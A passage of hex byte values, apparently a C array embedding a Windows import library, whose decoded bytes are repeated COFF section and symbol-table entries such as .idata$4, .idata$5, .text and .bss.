,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x34 ,0x80 ,0x01 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x08 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x35 ,0xc8 ,0x02 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x08 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x37 ,0x04 ,0x06 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x0b ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x74 ,0x65 ,0x78 ,0x74 ,0x00 ,0x00 ,0x00 ,0x80 ,0x19 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x64 ,0x61 ,0x74 ,0x61 ,0x00 ,0x00 ,0x00 ,0x60 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x62 ,0x73 ,0x73 ,0x00 ,0x00 ,0x00 ,0x00 ,0x10 ,0x09 ,0x00 ,0x00 ,0x06 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x37 ,0x10 ,0x06 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x35 ,0xd0 ,0x02 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x34 ,0x88 ,0x01 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x36 ,0x52 ,0x05 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x66 ,0x69 ,0x6c ,0x65 ,0x00 ,0x00 ,0x00 ,0x26 ,0x02 ,0x00 ,0x00 ,0xfe ,0xff ,0x00 ,0x00 ,0x67 ,0x01 ,0x66 ,0x61 ,0x6b ,0x65 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x68 ,0x6e ,0x61 ,0x6d ,0x65 ,0x00 ,0x00 ,0x00 ,0x88 ,0x01 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x66 ,0x74 ,0x68 ,0x75 ,0x6e ,0x6b ,0x00 ,0x00 ,0xd0 ,0x02 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x74 ,0x65 ,0x78 ,0x74 ,0x00 ,0x00 ,0x00 ,0x90 ,0x19 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x64 ,0x61 ,0x74 ,0x61 ,0x00 ,0x00 ,0x00 ,0x60 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x62 ,0x73 ,0x73 ,0x00 ,0x00 ,0x00 ,0x00 ,0x10 ,0x09 ,0x00 ,0x00 ,0x06 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x32 ,0x28 ,0x00 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x14 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x34 ,0x88 ,0x01 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x35 ,0xd0 ,0x02 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x66 ,0x69 ,0x6c ,0x65 ,0x00 ,0x00 ,0x00 ,0xd5 ,0x02 ,0x00 ,0x00 ,0xfe ,0xff ,0x00 ,0x00 ,0x67 ,0x01 ,0x66 ,0x61 ,0x6b ,0x65 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x74 ,0x65 ,0x78 ,0x74 ,0x00 ,0x00 ,0x00 ,0x90 ,0x19 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x64 ,0x61 ,0x74 ,0x61 ,0x00 ,0x00 ,0x00 ,0x60 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x62 ,0x73 ,0x73 ,0x00 ,0x00 ,0x00 ,0x00 ,0x10 ,0x09 ,0x00 ,0x00 ,0x06 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x34 ,0x90 ,0x01 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x08 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x35 ,0xd8 ,0x02 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x08 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x37 ,0x14 ,0x06 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x0b ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x74 ,0x65 ,0x78 ,0x74 ,0x00 ,0x00 ,0x00 ,0x90 ,0x19 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x64 ,0x61 ,0x74 ,0x61 ,0x00 ,0x00 ,0x00 ,0x60 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x62 ,0x73 ,0x73 ,0x00 ,0x00 ,0x00 ,0x00 ,0x10 ,0x09 ,0x00 ,0x00 ,0x06 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x37 ,0xb8 ,0x05 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x35 ,0x48 ,0x02 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x34 ,0x00 ,0x01 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x36 ,0xb6 ,0x04 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x74 ,0x65 ,0x78 ,0x74 ,0x00 ,0x00 ,0x00 ,0x98 ,0x19 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x64 ,0x61 ,0x74 ,0x61 ,0x00 ,0x00 ,0x00 ,0x60 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x62 ,0x73 ,0x73 ,0x00 ,0x00 ,0x00 ,0x00 ,0x10 ,0x09 ,0x00 ,0x00 ,0x06 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x37 ,0xb4 ,0x05 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x35 ,0x40 ,0x02 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x34 ,0xf8 ,0x00 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x36 ,0xa6 ,0x04 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x74 ,0x65 ,0x78 ,0x74 ,0x00 ,0x00 ,0x00 ,0xa0 ,0x19 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x64 ,0x61 ,0x74 ,0x61 ,0x00 ,0x00 ,0x00 ,0x60 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x62 ,0x73 ,0x73 ,0x00 ,0x00 ,0x00 ,0x00 ,0x10 ,0x09 ,0x00 ,0x00 ,0x06 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x37 ,0xb0 ,0x05 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x35 ,0x38 ,0x02 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x34 ,0xf0 ,0x00 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x36 ,0x94 ,0x04 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x74 ,0x65 ,0x78 ,0x74 ,0x00 ,0x00 ,0x00 ,0xa8 ,0x19 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x64 ,0x61 ,0x74 ,0x61 ,0x00 ,0x00 ,0x00 ,0x60 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x62 ,0x73 ,0x73 ,0x00 ,0x00 ,0x00 ,0x00 ,0x10 ,0x09 ,0x00 ,0x00 ,0x06 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x37 ,0xac ,0x05 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x35 ,0x30 ,0x02 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x34 ,0xe8 ,0x00 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x36 ,0x78 ,0x04 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x74 ,0x65 ,0x78 ,0x74 ,0x00 ,0x00 ,0x00 ,0xb0 ,0x19 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x64 ,0x61 ,0x74 ,0x61 ,0x00 ,0x00 ,0x00 ,0x60 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x62 ,0x73 ,0x73 ,0x00 ,0x00 ,0x00 ,0x00 ,0x10 ,0x09 ,0x00 ,0x00 ,0x06 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x37 ,0xa8 ,0x05 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x35 ,0x28 ,0x02 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x34 ,0xe0 ,0x00 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x36 ,0x6a ,0x04 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x74 ,0x65 ,0x78 ,0x74 ,0x00 ,0x00 ,0x00 ,0xb8 ,0x19 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x64 ,0x61 ,0x74 ,0x61 ,0x00 ,0x00 ,0x00 ,0x60 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x62 ,0x73 ,0x73 ,0x00 ,0x00 ,0x00 ,0x00 ,0x10 ,0x09 ,0x00 ,0x00 ,0x06 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x37 ,0xa4 ,0x05 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x35 ,0x20 ,0x02 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x34 ,0xd8 ,0x00 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x36 ,0x56 ,0x04 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x74 ,0x65 ,0x78 ,0x74 ,0x00 ,0x00 ,0x00 ,0xc0 ,0x19 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x64 ,0x61 ,0x74 ,0x61 ,0x00 ,0x00 ,0x00 ,0x60 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x62 ,0x73 ,0x73 ,0x00 ,0x00 ,0x00 ,0x00 ,0x10 ,0x09 ,0x00 ,0x00 ,0x06 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x37 ,0xa0 ,0x05 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x35 ,0x18 ,0x02 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x34 ,0xd0 ,0x00 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x36 ,0x4e ,0x04 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x74 ,0x65 ,0x78 ,0x74 ,0x00 ,0x00 ,0x00 ,0xc8 ,0x19 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x64 ,0x61 ,0x74 ,0x61 ,0x00 ,0x00 ,0x00 ,0x60 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x62 ,0x73 ,0x73 ,0x00 ,0x00 ,0x00 ,0x00 ,0x10 ,0x09 ,0x00 ,0x00 ,0x06 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x37 ,0x9c ,0x05 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x35 ,0x10 ,0x02 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x34 ,0xc8 ,0x00 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x36 ,0x30 ,0x04 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x74 ,0x65 ,0x78 ,0x74 ,0x00 ,0x00 ,0x00 ,0xd0 ,0x19 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x64 ,0x61 ,0x74 ,0x61 ,0x00 ,0x00 ,0x00 ,0x60 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x62 ,0x73 ,0x73 ,0x00 ,0x00 ,0x00 ,0x00 ,0x10 ,0x09 ,0x00 ,0x00 ,0x06 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x37 ,0x98 ,0x05 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x35 ,0x08 ,0x02 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x34 ,0xc0 ,0x00 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x36 ,0x1c ,0x04 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x74 ,0x65 ,0x78 ,0x74 ,0x00 ,0x00 ,0x00 ,0xd8 ,0x19 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x64 ,0x61 ,0x74 ,0x61 ,0x00 ,0x00 ,0x00 ,0x60 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x62 ,0x73 ,0x73 ,0x00 ,0x00 ,0x00 ,0x00 ,0x10 ,0x09 ,0x00 ,0x00 ,0x06 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x37 ,0x94 ,0x05 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x35 ,0x00 ,0x02 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x34 ,0xb8 ,0x00 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x36 ,0x02 ,0x04 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x74 ,0x65 ,0x78 ,0x74 ,0x00 ,0x00 ,0x00 ,0xe0 ,0x19 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x64 ,0x61 ,0x74 ,0x61 ,0x00 ,0x00 ,0x00 ,0x60 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x62 ,0x73 ,0x73 ,0x00 ,0x00 ,0x00 ,0x00 ,0x10 ,0x09 ,0x00 ,0x00 ,0x06 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x37 ,0x90 ,0x05 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x35 ,0xf8 ,0x01 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x34 ,0xb0 ,0x00 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x36 ,0xee ,0x03 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x74 ,0x65 ,0x78 ,0x74 ,0x00 ,0x00 ,0x00 ,0xe8 ,0x19 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x64 ,0x61 ,0x74 ,0x61 ,0x00 ,0x00 ,0x00 ,0x60 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x62 ,0x73 ,0x73 ,0x00 ,0x00 ,0x00 ,0x00 ,0x10 ,0x09 ,0x00 ,0x00 ,0x06 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x37 ,0x8c ,0x05 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x35 ,0xf0 ,0x01 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x34 ,0xa8 ,0x00 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x36 ,0xd8 ,0x03 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x74 ,0x65 ,0x78 ,0x74 ,0x00 ,0x00 ,0x00 ,0xf0 ,0x19 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x64 ,0x61 ,0x74 ,0x61 ,0x00 ,0x00 ,0x00 ,0x60 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x62 ,0x73 ,0x73 ,0x00 ,0x00 ,0x00 ,0x00 ,0x10 ,0x09 ,0x00 ,0x00 ,0x06 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x37 ,0x88 ,0x05 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x35 ,0xe8 ,0x01 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x34 ,0xa0 ,0x00 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x36 ,0xbe ,0x03 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x74 ,0x65 ,0x78 ,0x74 ,0x00 ,0x00 ,0x00 ,0xf8 ,0x19 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x64 ,0x61 ,0x74 ,0x61 ,0x00 ,0x00 ,0x00 ,0x60 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x62 ,0x73 ,0x73 ,0x00 ,0x00 ,0x00 ,0x00 ,0x10 ,0x09 ,0x00 ,0x00 ,0x06 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x37 ,0x84 ,0x05 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x35 ,0xe0 ,0x01 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x34 ,0x98 ,0x00 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 